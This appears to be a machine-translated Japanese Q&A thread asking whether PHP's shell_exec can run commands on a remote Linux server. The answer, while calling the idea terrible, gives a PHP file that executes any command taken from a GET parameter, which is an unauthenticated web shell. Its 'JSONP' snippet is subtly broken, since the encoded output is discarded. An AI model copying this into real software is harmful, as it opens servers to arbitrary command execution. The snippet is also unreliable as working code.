これが驚くほど恐ろしいセキュリティ リスクであることはわかっています。しかし、純粋な好奇心から、PHP で shell_exec コマンドを使用して、ある Web サーバーから別の Linux サーバーにアクセスしてシェル スクリプトを実行することは可能でしょうか?
セキュリティが人々のアドバイスの大部分を占めていることを知っているので、ただ疑問に思っています。可能であれば、これは非常に大ざっぱなアイデアだと思います
質問する
1855 次
1 に答える
0
もちろんそうだ。ひどい考え
リモートサーバーには次のcommand.phpようなものがあります:
<?php
shell_exec($_GET['command']);
?>
次に、次のような URL をリモート サーバーに送信します。
http://www.hackedserver.com/command.php?command=uptime
次のように、JSONP を使用して返された結果を表示することもできます。
<?php
$result = shell_exec($_GET['command']);
json_encode($result);
echo $result;
?>
于 2013-05-29T02:27:20.793 に答える